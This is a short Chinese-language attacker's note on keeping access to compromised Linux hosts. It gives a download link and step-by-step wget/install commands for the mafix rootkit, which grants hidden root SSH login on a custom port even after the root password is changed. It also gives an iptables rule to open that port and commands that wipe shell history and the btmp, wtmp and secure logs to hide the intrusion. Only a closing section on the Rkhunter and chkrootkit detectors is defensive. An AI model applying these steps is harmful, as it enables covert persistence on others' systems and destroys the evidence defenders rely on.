后门
(1)开机自动反弹shell
(2)linux后门
Rookit
目前常用的有:t0rn /mafix/enyelkm 等
mafix rootkit
Mafix是一款常用的轻量应用级别Rootkits,是通过伪造ssh协议漏洞实现远程登陆的特点是配置简单并可以自定义验证密码和端口号。
URL:http://forum.eviloctal.com/attachment.php?aid=13419
注意:在某些linux发行版上可能会遇到问题导致功能问题
安装及使用: wget http://forum.eviloctal.com/attachment.php?aid=13419 tar zvxf mafix.tar.gz cd mafix chmod +x root ./root pass port
安装完成后,使用ssh 用户@IP -P 配置的端口,即可远程登录。
netstat -tnl 也验证端口是开放的。之前解压文件的目录/home/mafix在编译完后自动消失,便于隐藏。
现在就可以用root,加上新密码、端口进行登录了,即使管理员改了root的密码也可以登录。
若无法登录,检查Linux的防火墙是否关闭,或者是否把新端口加入iptables中:
iptables -A RH-Firewall-1-INPUT -m state --state NEW -m tcp -p tcp --dport 端口 -j ACCEPT
痕迹清理
清理命令记录:
(1)仅清理当前用户: history -c
(2)使系统不再保存命令记录:vi /etc/profile,找到HISTSIZE这个值,修改为0
(3)删除记录
删除登录失败记录:echo > /var/log/btmp 删除登录成功记录:echo > /var/log/wtmp (此时执行last命令就会发现没有记录) 删除日志记录:echo > /var/log/secure
安全检测
Rkhunter
Rkhunter的中文名叫“Rootkit猎手”, 目前可以发现大多数已知的rootkits和一些嗅探器以及后门程序. 它通过执行一系列的测试脚本来确认服务器是否已经感染rootkits. 比如检查rootkits使用的基本文件, 可执行二进制文件的错误文件权限, 检测内核模块等等。
Chkrootkit
当然如果只是用Rkhunter检查扫描还是不够权威,再来安装一款检查下吧,chkrootkit 是一款小巧易用的Unix平台上的可以检测多种rootkit入侵的工具。它的功能包括检测文件修改、utmp/wtmp/last日志修改、界面欺骗(promiscuous interfaces)、恶意核心模块(maliciouskernel modules)。
相关链接
http://www.freebuf.com/articles/network/23665.html
http://www.myhack58.com/Article/html/3/8/2011/29132.htm
http://www.tuicool.com/articles/eIv22az